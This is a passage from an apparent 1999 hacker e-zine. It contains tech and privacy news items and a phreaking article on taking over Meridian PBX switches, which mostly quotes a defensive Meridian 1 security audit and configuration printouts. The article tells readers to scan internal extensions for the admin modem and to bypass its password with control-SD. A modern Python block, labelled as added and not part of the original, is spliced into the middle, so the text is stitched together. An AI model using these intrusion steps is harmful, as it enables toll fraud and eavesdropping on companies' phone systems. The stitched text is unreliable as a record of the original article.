In a sample of 300 Windows NT systems managers, 88 percent said accidental deletions were the leading cause of lost data, followed by 7 percent blaming intentional deletions, and a scant 3 percent blaming viruses. Most IT managers said they had suffered a critical loss of data as a result of an accidental deletion (69 percent).

"I believe it," said Todd Dion, vice president of technology at Tutor Time, a chain of child care centers that hosts its systems on Windows NT servers. Dion said he's encountered viruses a handful of times, but lost data as a result of user error is a regular occurrence.

For example, one employee in Tutor Time's accounting department regularly copies reports to a floppy and then immediately copies them back to the hard disk, and about once a month, copies the old version on the floppy over the new version on the hard disk, and, ultimately, needs rescuing.

In another instance, a consultant upgrading accounting systems erased an entire folder of records and then overwrote the folder with old data. "The CFO called me in at 11:30 on Friday night, and I swear, I expected to find his hands around the consultant's throat," Dion said.

While many systems managers seek to avoid such problems by routinely backing up user data, IT managers were evenly split on whether that provides complete protection against data loss. Of the 48 percent who said backups provide incomplete protection, a bit more than half said the reason is data can be lost between backups (55 percent). Another source of problems is backups are not always reliable and sometimes do not work properly (26 percent).

But a good regimen of backups can minimize risk, Proffit said. IT managers should install and use backup products, such as Veritas' Backup Exec and Computer Associates' ARCserve IT. Both can be managed by the IT manager rather than trusting the user to make a backup, because the user is not likely to do it.

IT managers should also install "undelete" products for NT, such as Symantec Norton Utilities 2.0 for Windows NT and Undelete for Windows NT from Executive Software.

@HWA

27.0 Echelon Education Website Launched
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lord of the Flies

xechelon.org's purpose is to inform people of Echelon's existence and provide them tools and information with which they can loudly object to and thwart this pervasive government surveillance network.

xechelon.org
http://xechelon.org/

@HWA

28.0 FTC Says Screw You and Your Privacy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by pDick

Orson Swindle, Commissioner of the FTC, has said he would lead the charge to prevent regulations regarding privacy. He went on to say that the consumer should be the guard of his own privacy.

(Someone needs to give this guy an education. With companies like RealNetworks ripping your information without your knowledge we need laws. How can the consumer hope to guard himself against something he does not know about?)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2387484,00.html

FTC commissioner: No privacy regs

By Lisa M. Bowman, ZDNN
November 3, 1999 12:59 PM PT

Don't expect the Federal Trade Commission to jump in anytime soon to prevent debacles such as the RealNetworks Inc. privacy snafu -- not if commissioner Orson Swindle has his way.
Swindle, one of four commissioners on the agency that enforces consumer protection laws, said he would be "leading the charge" to prevent regulation regarding privacy, even though RealNetworks (Nasdaq:RNWK) angered many customers after a security expert discovered it was tracking users' music listening habits without their knowledge.

"The consumer ultimately is the guard of his own privacy," said Swindle, speaking before a group of Silicon Valley attorneys at an event sponsored by law firm Wilson, Sonsini, Goodrich & Rosati in Palo Alto, Calif. "The government cannot take care of everybody."

In July, the FTC approved a report recommending that Congress not regulate collection of private data, and Swindle said that stance should remain the same. "The private sector has the motivation: Good privacy practice is good business," he said.

FTC regs confined to children

The only Internet privacy issue the FTC has embraced so far has involved children under 13 years of age. Two weeks ago, the commission issued a set of rules that require sites to get parental permission if they want to sell or share personal information to other companies. Swindle, who's known to oppose many kinds of regulation, surprised people by jumping behind the unanimous vote supporting the new rules. However, under the guidelines, the sites still are free to collect personal information of all kinds if they only plan to use it internally.

U.S. companies are facing somewhat of a conundrum as they try to do business with companies in the European Union, which holds individual privacy in much higher regard.

Swindle, who was held as a POW in Vietnam for six years and also served as a spokesman during Ross Perot's 1992 presidential bid, embraces the same hands-off policy for Internet taxation that he does for privacy.
During his speech he told audience members, many of them tax attorneys, that adding special taxes to Internet transactions could slow down the tech economy, which he said is "roaring like a house afire." "Any misstep on our part will have great consequences," he said. "It could literally choke off innovation."

Swindle supports McCain bill

The Clinton administration took a similar stance last year. In October 1998, President Clinton signed a bill that, among other things, placed a three-year moratorium on Internet taxes.

In particular, Swindle said he supports a bill by presidential candidate Sen. John McCain, R-Ariz., that would permanently ban Internet sales taxes and urge the World Trade Organization to adopt a global moratorium on them.

Swindle did raise concerns about privacy at one point, but he tied them to taxation. He said consumer privacy could be violated by huge databases that would be required to keep track of people's purchases as the goods that they buy move through various taxing authorities.

@HWA

29.0 ParseTV to Adopt New Format
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Micheal

After posting our rumor yesterday HNN received this email:

"After a year and a half, Parse and its host Shamrock have parted ways. The split was amicable. Within the next few weeks, Pseudo will be launching "ParseTV.com", the digital subCULTure channel.

As we prepare programming for Parsetv, we are committed to working with hosts and producers who can devote the time necessary to make Parse a top resource for hacking culture and technical information related to hacking and security. Unfortunately, Shamrock was unable to make such a commitment at this time. I myself, still believe that Shamrock has a very valuable role to play in hacker media. His outspokenness and pranks were refreshing to the community. Perhaps down the road, he might return to Parse in an undetermined role, but that will have to be worked out at some later date.
Additionally, I want to state that his departure so soon after the airing of the MTV hacker show is purely coincidental."

- Rinz, Producer of Parsetv.com

Parsetv.com

30.0 Meridian I hacking by BL4CKM1LK teleph0nics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
     . .. ... .......... http://hybrid.dtmf.org ......... ... .. .

So close it has no boundaries...

A blinking cursor pulses in the electric darkness like a heart coursing with phosphorous light, burning beneath the derma of black-neon glass. A PHONE begins to RING, we hear it as though we were making the call. The cursor continues to throb, relentlessly patient, until...

     Meridian I Switch and Trunk Interception.......... ..... ... .
     An account of how an ENTIRE company's PBX.......... ..... ... .
     can be taken over (The hardcore phreak way)....... ..... ... .
     by hybrid ...... ..... ... .

Hi. I'm not going to write a mad big introduction to this article, because I don't feel there is a need for one. All I want to say here is that this article is intended for the more "hardcore" phreak, yes, hardcore phreak, not for lame ass calling card leeching kiddies who call themselves phreaks. If you are interested in hacking telephony switches, and you have prior/prefixed knowledge of Meridian, read on..

Through my experience, I've seen a lot of Meridian admins go through many different and sometimes repetitive lengths to supposedly secure an internal PSTN connected PABX. In this article I'm going to share my knowledge of PBX switch hacking, and enlighten you to the intricate techniques that can be used to "trunk hop" etc. The information provided in this article has been obtained from my own personal accounts of hacking telephony switches, which I'd like to state, I don't participate in anymore. Now, for the sake of timesaving, I'll setup a possible scenario..
Consider the following:

 o You have stumbled across a nice Meridian Mail system, which you have already compromised by finding yourself a few boxes in there. You discover that the Meridian Mail system you have gained access to belongs to a certain telco, and is used for internal communication between employees high up in the hierarchical chain.

Now, any "normal" phreak would gradually take over the system by finding as many free boxes as possible and handing them over to friends, or would keep the nice lil' system to themselves as a means of obtaining information about the telco that owns the PBX, via the means of eavesdropping on used voicemail boxes. This is a very primitive form of remote eavesdropping, which this file is not designed to illustrate.

Meridian PBX systems are all administered by a primary system console, which can be remotely accessed by many different protocols. The most popular of which is remote dialup via assigned extensions. If the company's main switch is centrex based, it is likely that the Meridian admin console is accessible via IP on the company's intranet. If you manage to gain access to the actual switching component, you are likely to have the following privileges on the Meridian based network:

 o 100% control over every single inbound/outbound trunk group
 o Access to every single voicemail box on the switch
 o Access to trunk/group/node administration

Basically, the Meridian administration module is designed to make the admin (or whoever has access to it) GOD over the entire system, I say GOD because you could do anything you wanted, as far as your telephony derived imagination extends. OK, enough of this.. I'm just going to stop going on about what if's for the time being, now I'm going to concentrate on the factual based information, and how one would go about accessing such a switch.

The simplest way to find the internal dialup to a Meridian switch is to scan the internal extensions which the switch controls.
It's generally a good idea to begin scanning network/node extensions such as 00,01,02,03[xx] etc. What you are looking for is a modem carrier, which when you connect should ask you for a singular password, which in most cases is bypassed by hitting control-SD. Once you are in, you should receive the switch's command line prompt, something similar to this:

     >

or

     SWITCH0>

OMG, I hear you think.. It looks like a DMS switch prompt.. Well, it is, in a funny kind of way. Meridian switches are designed to emulate certain levels of DMS-100 O/S types, so you'll find that many of the BCS leveled commands that you know from DMS will be useful here. The information that follows has been obtained from public Meridian Mail Administration sources on the net..

/*

Basic Meridian 1 Security Audit
-------------------------------

"Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system."

An audit of the Meridian 1 telephone system will ensure that every possible "system" precaution has been made to prevent fraud. The first step involves querying data from the system in the form of printouts (or "capturing" the data to a file in a PC). The next step is to analyze the data and confirm the reason for each entry.

Please be advised that this procedure is not designed for all "networked" Meridian 1 systems, however, most of the items apply to all systems. Use at your own risk.

PRINTOUTS REQUIRED FOR SECURITY AUDIT:

It is suggested that you "capture" all of the data from these printouts to separate files. This can be accomplished with a PC and communications program. For the BARS LD90 NET printout, try this file.
(enclosed in faith10.zip barparse.zip)

------------------------------------------------------------------------------
LD22 CFN    LD22 PWD    LD21 CDB    LD21 RDB    LD21 LTM
LD23 ACD    LD24 DISA   LD20 SCL    LD86 ESN    LD86 RLB
LD86 DMI    LD87 NCTL   LD87 FCAS   LD87 CDP    LD90 NET
LD90 SUM    LD20 TNB    LD22 DNB    LD88 AUB
------------------------------------------------------------------------------

GATHERING DATA FROM LD81
------------------------

List (LST) the following FEAT entries to form an information base on the telephones.

------------------------------------------------------------------------------
NCOS 00 99   CFXA   UNR   TLD   SRE   FRE   FR1   FR2   CUN   CTD
------------------------------------------------------------------------------

DATA BLOCK REVIEW ITEMS
-----------------------

From the printouts, a review of the following areas must be made. Some of the items may or may not be appropriate depending on the applications of the telephone system.

------------------------------------------------------------------------------
CFN - Configuration

    Verify that History File is in use.

------------------------------------------------------------------------------
PWD - Passwords

    Verify that FLTH (failed login attempt threshold) is low enough. Verify that PWD1 and PWD2 (passwords) use both alpha and numeric characters and are eight or more characters long. Note any LAPW's (limited access passwords) assigned. Enable audit trails.

------------------------------------------------------------------------------
CDB - Customer Data Block

    Verify that CFTA (call forward to trunk access code) is set to NO. Verify NCOS level of console. Verify that NIT1 through NIT4 (or other night numbers) are pointing to valid numbers. EXTT prompt should be NO to work in conjunction with trunk route disconnect controls (See RDB).

------------------------------------------------------------------------------
RDB - Trunk Route Data Block

    Verify that every route has a TARG assigned. Confirm that FEDC and NEDC are set correctly.
    ETH is typical, however for maximum security in blocking trunk to trunk connections, set NEDC to ORG and FEDC to JNT. Confirm that ACCD's are a minimum of four digits long (unless for paging). If ESN signaling is active on trunk routes, verify that it needs to be. ESN signaling, if not required, should be avoided.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block.

------------------------------------------------------------------------------
ACD - Automatic Call Distribution

    Verify ACD queues and associated NCFW numbers. Verify all referenced extensions.

------------------------------------------------------------------------------
DISA - Direct Inward System Access

    Remove DISA if not required. If required, verify that security codes are in use.

------------------------------------------------------------------------------
ESN - Electronic Switched Network

    AC1 is typically "9". If there is an AC2 assigned, verify its use. If TOD or ETOD is used - verify what NCOS levels are changed, when they are changed and why they are changed.

    Apply FLEN to your SPNs to ensure nobody is ever allowed to be transferred to a partially dialed number, like "Transfer me to 91800".

    Study EQAR (Equal Access Restriction) to ensure that users can only follow a "Carrier Access Code" with a zero rather than a one: (1010321-1-414-555-1212 is blocked but 1010321-0-414-555-1212 is allowed with EQAR)

------------------------------------------------------------------------------
NCTL - Network Control

    Use LD81 FEAT PRINT to verify all NCOS being used. Does NCOS 0 = FRL 0? Does NCOS X always equal FRL X in the NCTL? Does FRL 0 have any capabilities? - It should not be able to dial anything.

------------------------------------------------------------------------------
FCAS - Free Call Screening

    Confirm the need to use FCAS and remove it if possible.
    FCAS is usually a waste of system memory and complicates the system without saving money.

------------------------------------------------------------------------------
DGT (DMI) - Digit Manipulation

    Confirm all numbers referenced in the "insert" section of each DMI table.

------------------------------------------------------------------------------
RLB - BARS Route List Block

    Are any RLB ENTR's assigned FRL 0? Typically, only the RLB that handles 911 calls should have an FRL 0. If DMI is in use, confirm all "inserted" numbers.

------------------------------------------------------------------------------
CDP - BARS Coordinated Dialing Plan

    Are all CDP numbers valid? Check the RLBs they point to and see what the DMI value is. Confirm insertions.

------------------------------------------------------------------------------
NET - ALL - BARS Network Numbers

    Add 000,001,002,003,004,005,006,007,008,009 as SPNs pointing to a route list block that is set to LTER YES. These entries block transfers to "ext. 9000" and similar numbers.

    Point SPN "0" to a RLI with a high FRL, then consider adding new SPNs of 02, 03, 04, 05, 06, 07, 08, 09 to point to a RLI with a lower FRL so that users cannot dial "0", but can dial "0+NPA" credit card calls.

    Check FRL of 0, 00, 011 and confirm that each is pointed to a separate NET entry requiring a high FRL.

    Remove all off-shore NPAs (like 1-809 Dominican Republic) if possible. Regulations are almost non-existent in some of those areas and they are hot fraud targets.

    Verify blocking 900 and 976 access. Also consider blocking the NXX of your local radio station contest lines. Users will go nuts calling a radio station to win a free toaster, taking over all the trunks in your phone system.

    Restrict the main numbers and DID range within the BARS system. There is no need to call from an outgoing to an incoming line at the same location.
------------------------------------------------------------------------------
TRUNKS

    Confirm that all trunks have TGAR assigned. Confirm that all incoming and TIE trunks have class of service SRE assigned. (caution on networked systems) Confirm that all trunks have an NCOS of zero.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block.

------------------------------------------------------------------------------
SETS-PHONES

    Does every phone have a TGAR of 1 assigned? (This must be checked set by set, TN by TN).

    Can you change every phone that is UNR to CTD? Review LD81 FEAT PRINT to find out the UNR sets. CTD class of service is explained below.

    Confirm that all sets are assigned CLS CFXD. Confirm that the NCOS is appropriate on each set. In Release 20 or above, removing transfer feature may be appropriate. Confirm that all sets CFW digit length is set to the system DN length.

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1". The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block.

    Apply Flexible Trunk to Trunk Connections on the set, and FTOP in the CDB if deemed appropriate. These restrictions are done on a set by set basis and allow or deny the ability to transfer incoming calls out of the facility.

------------------------------------------------------------------------------
VOICE MAIL PORTS

    Each port should be CLS of SRE.
    Each port should be NCOS 0 - NCOS 0 must be known to be too low to pass any call.
    Each port should be TGAR 1 (all trunk routes must be TARG 1 also).

    NOTES ON TGAR: For demonstration purposes, this document suggests that sets be a "TGAR 1".
    The only requirement for TGAR is that it match one of the TARG numbers assigned in the Route Data Block.

    NOTE: If you are used to your Mail system doing outcalling, you can forget about that working after applying these restrictions.

------------------------------------------------------------------------------

CLASS OF SERVICE AND TRUNK GROUP ACCESS RESTRICTIONS:
-----------------------------------------------------

EXPLANATION OF CLASS OF SERVICE SRE:
------------------------------------

NTP DEFINITION: Allowed to receive calls from the exchange network. Restricted from all dial access to the exchange network. Allowed to access the exchange network through an attendant or an unrestricted telephone only.

Essentially, an SRE set can do nothing on its own except dial internal and TIE line extensions. If a trunk is SRE - it will work normally and allow conference calls and transfers.

EXAMPLES OF 'SRE' IN USE:
-------------------------

Voice Mail cannot connect to an outgoing line, but can receive incoming calls.

Callers on the far end of a TIE line cannot call out through your end (for their sake, both ends should be SRE).

EXPLANATION OF CLASS OF SERVICE CTD:
------------------------------------

If a route access code is accessed (if there was no match between the TGAR and TARG), the caller cannot dial 1 or 0 as the leading digits. If the caller makes a "dial 9" BARS call, the NCOS will control the call.

EXPLANATION OF TGAR AND TARG:
-----------------------------

The best restriction is to have all trunk routes TARG'd to 1 and all TNs (including actual trunk TNs) TGAR'd to 1. This will block all access to direct trunk route selection.

BENEFITS OF IMPLEMENTING THESE SECURITY RESTRICTIONS
----------------------------------------------------

No incoming caller will have access to an outside line unless physically transferred or conferenced by an internal party.
If voice mail ports are SRE and NCOS 0 and have a TGAR matching the TARG - they will not be able to transfer a call out of the system, regardless of the voice mail system's resident restrictions assigned.

No phone will be able to dial a trunk route access code. Consider allowing telecom staff this ability for testing.

Layered security:
-----------------

If in phone programming, TGAR was overlooked on a phone, the CTD class of service would block the user from dialing a 0 or 1 if they stumble upon a route access code.

If in programming, the CTD class of service was overlooked, both TGAR and NCOS would maintain the restrictions.

If in programming, the NCOS is overlooked, it defaults to zero, which is totally restricted if NCTL and RLBs are set up correctly.

Quick Tour of a Simple Meridian 1 BARS Call
-------------------------------------------

Basic Automatic Route Selection. If you dial "9", you are accessing BARS. "9" is the "BARS Access Code".

1. A telephone dials "9" - BARS activates.
2. The telephone calls a number - Example: 1-312-XXX-XXXX
3. The PBX holds the digits while it looks up "1-312" to figure out what Route List to use for processing the call.
4. The Route List determines the possible trunk routes that can be used.
5. The Route List checks the facility restriction level of the telephone and compares it to its own required facility restriction level.
6. The Route List checks to see if any special digit manipulation should be performed.

LD90 NET
--------

The LD90 Network overlay is where area codes and exchanges are defined. If a prefix is not entered into LD90, it cannot be dialed through BARS. Each area code or exchange refers to a "Route List" or RLI which contains the instructions for routing the call.
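The following Python is an added example, not part of the original article or of the audit document it quotes. It codes the six-step BARS flow just described and the layered set restrictions from the checklist (TGAR against TARG, CTD, NCOS mapped to FRL through NCTL) using the sample values from the LD90 NET, LD86 RLB, LD87 NCTL and LD86 DGT printouts that follow in this section. The ROUTE_TARG table and the sample set printout are constructed for the demonstration (every route TARG 1, as the audit recommends), and the parser's handling of CLS continuation lines is a simplification that fits the printout format shown here.

```python
# Added example: BARS call walk-through plus the audit's set-restriction checks.
# Data below is taken from the LD90/LD86/LD87 printouts in this section;
# ROUTE_TARG and SAMPLE_SET are constructed for the demonstration.

NCTL_FRL = {0: 0, 1: 1, 2: 0, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7}  # LD87 NCTL: NCOS -> FRL

RLI = {  # LD86 RLB, RLI 11: entries in order of preference
    11: [{"entr": 0, "rout": 15, "frl": 3, "dmi": 10},
         {"entr": 1, "rout": 9, "frl": 6, "dmi": 0}],
}
NET = {"1312": {"rli": 11, "deny": {"976"}}}   # LD90 NET: NPA 1312 -> RLI 11, DENY 976
DMI = {10: (1, ""), 3: (0, "101288")}          # LD86 DGT: DMI -> (DEL count, INST digits)
ROUTE_TARG = {15: {1}, 9: {1}}                 # constructed: every trunk route TARG 1


def set_frl(ncos):
    """NCOS -> FRL via the NCTL block; an NCOS not defined there has no capability."""
    return NCTL_FRL.get(ncos, 0)


def bars_call(ncos, digits):
    """Steps 1-6 of the BARS tour. `digits` is what follows AC1 "9", e.g. "13125551212".
    Returns (trunk route, digits sent on the trunk) or (None, reason) when blocked."""
    prefix = next((p for p in sorted(NET, key=len, reverse=True) if digits.startswith(p)), None)
    if prefix is None:                        # step 3: no NET entry => not dialable via BARS
        return None, "no NET entry for this number"
    net = NET[prefix]
    exchange = digits[len(prefix):len(prefix) + 3]
    if exchange in net["deny"]:               # SDRR DENY on the NET entry
        return None, f"exchange {exchange} denied (SDRR DENY)"
    frl = set_frl(ncos)
    for entry in RLI[net["rli"]]:             # steps 4-5: first entry whose FRL the set meets
        if frl >= entry["frl"]:
            delete, insert = DMI.get(entry["dmi"], (0, ""))
            return entry["rout"], insert + digits[delete:]   # step 6: digit manipulation
    return None, f"FRL {frl} below every entry in RLI {net['rli']}"


def parse_tn_block(text):
    """Parse a captured set printout (DES/TN/TYPE ... CLS ... format) into a dict.
    CLS tokens run over several lines; while inside CLS, a line made only of
    alphabetic tokens is taken as a continuation (adequate for this format)."""
    block, cls, in_cls = {}, set(), False
    for line in text.strip().splitlines():
        tokens = line.split()
        if not tokens:
            continue
        if tokens[0] == "CLS":
            in_cls = True
            cls.update(tokens[1:])
        elif in_cls and all(t.isalpha() for t in tokens):
            cls.update(tokens)
        else:
            in_cls = False
            block[tokens[0]] = " ".join(tokens[1:])
    block["CLS"] = cls
    return block


def direct_route_call(block, route, number):
    """Dialling a trunk route access code directly (not via BARS), layered as the
    audit describes: a TGAR matching a TARG on the route blocks the call; failing
    that, CTD blocks a leading 0 or 1."""
    if int(block.get("TGAR") or 0) in ROUTE_TARG.get(route, set()):
        return False, "TGAR matches route TARG"
    if "CTD" in block["CLS"] and number[:1] in ("0", "1"):
        return False, "CTD blocks leading 0/1 on a route access code call"
    return True, "allowed"


def audit_set(block, voice_mail_port=False):
    """SETS-PHONES / VOICE MAIL PORTS checks from the audit, returned as findings."""
    findings, cls = [], block["CLS"]
    if block.get("TGAR") != "1":
        findings.append("TGAR is not 1 (must match a route TARG)")
    if voice_mail_port:
        if "SRE" not in cls:
            findings.append("voice mail port is not CLS SRE")
        if block.get("NCOS") != "0":
            findings.append("voice mail port NCOS is not 0")
    else:
        if "UNR" in cls or "CTD" not in cls:
            findings.append("set is not CTD; change UNR to CTD")
        if "CFXD" not in cls:
            findings.append("set lacks CLS CFXD (external call forward allowed)")
    return findings


# Constructed sample, modelled on the DES 5135 telephone block in this section.
SAMPLE_SET = """
DES 5135
TN 004 0 14 00
TYPE 500
CUST 0
DN 5135
TGAR 1
NCOS 5
CLS CTD DTN FBD XFA WTA THFD FND HTD ONS
    CFXD ARHD OVDD AGTD CLTD LDTA ASCD
RCO 0
PLEV 02
FTR CFW 4
"""

if __name__ == "__main__":
    phone = parse_tn_block(SAMPLE_SET)
    print("NCOS", phone["NCOS"], "-> FRL", set_frl(int(phone["NCOS"])))
    print(bars_call(int(phone["NCOS"]), "13125551212"))   # (15, '3125551212')
    print(bars_call(int(phone["NCOS"]), "13129761212"))   # 976 exchange denied
    print(direct_route_call(phone, 15, "15551212"))       # blocked by TGAR/TARG
    print("findings:", audit_set(phone))
```

Running it against the sample set answers the printout's own question (NCOS 5 equals FRL 5 in this NCTL), shows entry 0 of RLI 11 carrying the call with the leading "1" deleted by DMI 10, and shows that NCOS 2 (FRL 0 in the printed NCTL) cannot complete a BARS call at all, which is the behaviour the "Layered security" paragraphs rely on.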
     >ld 90
     ESN000
     REQ prt
     CUST 0
     FEAT net
     TRAN ac1
     TYPE npa
     NPA 1312

     NPA 1312          <-- This is the network number (prefix)
     RLI 11            <-- This is the Route List that the prefix gets instruction from
     DENY 976          <-- This is an exchange in NPA 312 that is blocked
     SDRR DENY
     CODES = 1
     DMI 0
     ITEI NONE
     REQ end

LD86 RLB (or RLI)
-----------------

The RLB is a "list" of possible trunk routes that an area code or exchange can be dialed over. Each "ENTR" or list entry contains a trunk route. Each entry also has a "minimum Facility Restriction Level" or "FRL" that must be met before a phone can access that entry. In the following example, the first entry can be accessed by phones whose NCOS equals an FRL of 3 or above. The second entry can only be accessed by phones whose NCOS equals an FRL of 6 or above. Along with the trunk route and the FRL, you can apply specific "digit manipulation" with the DMI entry. The DMI entries are explained here.

     >ld 86
     ESN000
     REQ prt
     CUST 0
     FEAT rlb
     RLI 11

     RLI 11
     ENTR 0            <-- This is the list's first "Entry Number"
     LTER NO
     ROUT 15           <-- This is the first choice Trunk Route Number
     TOD 0 ON 1 ON 2 ON 3 ON
         4 ON 5 ON 6 ON 7 ON
     CNV NO
     EXP NO
     FRL 3             <-- This is the Facility Restriction Level
     DMI 10            <-- This is the Digit Manipulation Index Number
     FCI 0
     FSNI 0
     OHQ YES
     CBQ YES

     ENTR 1            <-- This is the list's second "Entry Number"
     LTER NO
     ROUT 9            <-- This is the second choice Trunk Route Number
     TOD 0 ON 1 ON 2 ON 3 ON
         4 ON 5 ON 6 ON 7 ON
     CNV NO
     EXP YES           <-- This is considered the "expensive" choice
     FRL 6             <-- Note that the Facility Restriction Level is higher
     DMI 0             <-- Note no digit manipulation is required for this trunk route
     FCI 0
     FSNI 0
     OHQ YES
     CBQ YES

     ISET 2
     MFRL 3
     REQ end

LD87 NCTL
---------

The FRL to NCOS "relationship" is built in the NCTL data block. The FRL and the NCOS do not necessarily have to equal one another, however they usually do. A higher FRL/NCOS has more capability than a lower FRL/NCOS.
For an NCOS number to have any capability, it must first be defined in the NCTL data block.

     >ld 87
     ESN000
     REQ prt
     CUST 0
     FEAT nctl
     NRNG 0 7          <-- Range from NCOS 0 through 7 was requested

     SOHQ NO
     SCBQ YES
     CBTL 10
     ---------------
     NCOS 0
       EQA NO   FRL 0   RWTA NO    NSC NO   OHQ NO   CBQ NO
       MPRI 0   PROM 0
     ---------------
     NCOS 1
       EQA NO   FRL 1   RWTA NO    NSC NO   OHQ NO   CBQ YES
       RETT 10  RETC 5  ROUT I     RADT 0   SPRI 0   MPRI 0   PROM 0
     ---------------
     NCOS 2
       EQA NO   FRL 0   RWTA NO    NSC NO   OHQ NO   CBQ NO
       MPRI 0   PROM 0
     ---------------
     NCOS 3
       EQA NO   FRL 3   <-- NCOS 3 equals FRL 3.
       RWTA YES NSC NO  OHQ NO     CBQ YES
       RETT 10  RETC 5  ROUT I     RADT 10  SPRI 0   MPRI 0   PROM 0
     ---------------
     NCOS 4
       EQA NO   FRL 4   RWTA YES   NSC NO   OHQ NO   CBQ YES
       RETT 10  RETC 5  ROUT A     RADT 10  SPRI 0   MPRI 0   PROM 0
     ---------------
     NCOS 5
       EQA NO   FRL 5   RWTA NO    NSC NO   OHQ NO   CBQ YES
       RETT 10  RETC 5  ROUT A     RADT 10  SPRI 0   MPRI 0   PROM 0
     ---------------
     NCOS 6
       EQA NO   FRL 6   <-- NCOS 6 equals FRL 6.
       RWTA NO  NSC NO  OHQ NO     CBQ YES
       RETT 10  RETC 5  ROUT A     RADT 0   SPRI 0   MPRI 0   PROM 0
     ---------------
     NCOS 7
       EQA NO   FRL 7   RWTA NO    NSC NO   OHQ NO   CBQ YES
       RETT 10  RETC 5  ROUT A     RADT 0   SPRI 0   MPRI 0   PROM 0

     TOHQ NONE

LD86 Digit Manipulation
-----------------------

The Digit Manipulation data blocks are where special prefixes are entered before numbers are sent out over trunks. An example of digit manipulation is where a 1010XXX carrier access code must be inserted before a number is processed over a trunk.

     REQ prt
     CUST 0
     FEAT dgt
     DMI 10

     DMI 10            <-- This is simply the index number.
     DEL 1             <-- This says "delete the first digit after 9"
     CTYP NCHG

     REQ prt
     CUST 0
     FEAT dgt
     DMI 3

     DMI 3
     DEL 0             <-- This says "delete nothing after 9"
     INST 101288       <-- This says "Insert 101288 after 9 and before the actual number dialed"
     CTYP NCHG
     REQ end

Telephone
---------

This is simply a telephone's data block.

     DES 5135
     TN 004 0 14 00
     TYPE 500
     CDEN 4D
     CUST 0
     DN 5135 MARP
       CPND
         NAME Typical User
         XPLN 9
         DISPLAY_FMT FIRST,LAST
     AST NO
     IAPG 0
     HUNT
     TGAR 1
     LDN NO
     NCOS 5            <-- What FRL does this equal?
     SGRP 0
     RNPG 0
     LNRS 16
     XLST
     SCI 0
     CLS CTD DTN FBD XFA WTA THFD FND HTD ONS LPR XRA CWD SWD MWA LPD XHD CCSD LNA
         TVD CFTD SFD C6D PDN CNID CLBD AUTU ICDD CDMD EHTD MCTD GPUD DPUD CFXD ARHD
         OVDD AGTD CLTD LDTA ASCD MBXD CPFA CPTA DDGA NAMA SHL ABDD CFHD USRD BNRD
         OCBD
     RCO 0
     PLEV 02
     FTR CFW 4
     DATE 28 NOV 1978

LD86 ESN - the Start of BARS
----------------------------

The ESN data block is the root of BARS. Before BARS can be set up, the ESN data block must be defined.

     >ld 86
     ESN000
     REQ prt
     CUST 0
     FEAT esn

     MXLC 0
     MXSD 30
     MXIX 0
     MXDM 100
     MXRL 80
     MXFC 60
     MXFS 0
     MXSC 120
     NCDP 4
     AC1 9             <-- This is where "9" is defined
     AC2
     DLTN YES
     ERWT YES
     ERDT 0
     TODS 0 00 00 23 59   <-- This section refers only to time of day routing controls
     RTCL DIS
     NCOS 0 - 0        <-- This section refers only to time of day routing controls
     NCOS 1 - 1
     NCOS 2 - 2
     NCOS 3 - 3
     NCOS 4 - 4
     NCOS 5 - 5
     NCOS 6 - 6
     NCOS 7 - 7
     NCOS 99 - 99
     ETOD
     TGAR NO
     REQ end

ISLUA 99 Session BA 20
Capturing Data From Your Meridian 1 to Various PC Software Packages
Curt Kempf
City of Columbia, Missouri

Thanks for attending the workshop. I hope you find this information helpful.

========================================

 o ACD Daily Report
 o Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT
 o TN PRT out of Host MCA card
 o Procomm Script to CHG a TN when it becomes IDLE
 o Procomm Script to CHG/NEW a list of DNs and their NAMES (LD 95)
 o Procomm Script to monitor PBX for "DTA0021", "INI0", "PWR01", then send an alpha numeric page when received.

ACD Daily Report
================

     ACD 000 1999 03 29 17:00  DAILY TOTALS REPORT

     REPT 1
     ACD   AVG   CALLS  AVG  AVG  AVG  AVG   AVG   DN     AVG   #-XFER    AVG-TIME-POSN
     DN    AGTS  ANSWD  ASA  DCP  PCP  WORK  WAIT  CALLS  TIME  IDN  ACD  BUSY   MANNED
     7380        324    54   125  388  514   127   118    69    0    28   22085  27246
     ------------------------------------------------------------------------------
     1           324    54   125  388  514   127   118    69    0    28   22085  27246

     REPT 2
     ACD   CALLS    RECALL  ANSWERED  ABANDONED         TOF  TOF  OVER  INTER  DN    LONGEST  NO.
     DN    ACCPTED  TO      AVG.WT    TSF   IN   OUT  FLOW  FLOW  SOURCE WT.   TIME     BUSY
     7380  366      0       476       43    88   80   0     0     8      0
     ------------------------------------------------------------------------------
     1     366      0       476       43    88   80   0     0     8      0

     REPT 4
     POS  CALLS  AVG  AVG  AVG   DN   INC   DN   OUT   #-XFER    BUSY   MANNED
     ID   ANSWD  DCP  PCP  WAIT  INC  TIME  OUT  TIME  IDN  ACD  TIME   TIME
     ACD DN 7380
     301  81     136  115  142   3    66    12   352   0    9    20716  32208
     303  57     91   261  139   4    478   15   652   0    4    20788  28702
     309  49     90   2    182   0    0     1    100   0    7    4550   13466
     304  87     128  127  108   1    60    12   564   0    6    22662  32088
     305  39     185  108  73    0    0     2    96    0    1    11464  14302
     308  0      ***** ***** *****  15  1770  20   1464  0    0    32256  32400
     306  0      ***** ***** *****  9   2950  13   1660  0    0    32400  32400
     312  11     145  2686 50    4    286   7    416   0    1    31848  32400
     ------------------------------------------------------------------------
     8    324    125  388  127   36   93    82   88    0    28   2945   3633

Procomm Plus Script to capture ACD reports to disk. Format: MMDDYY.TXT
====================================

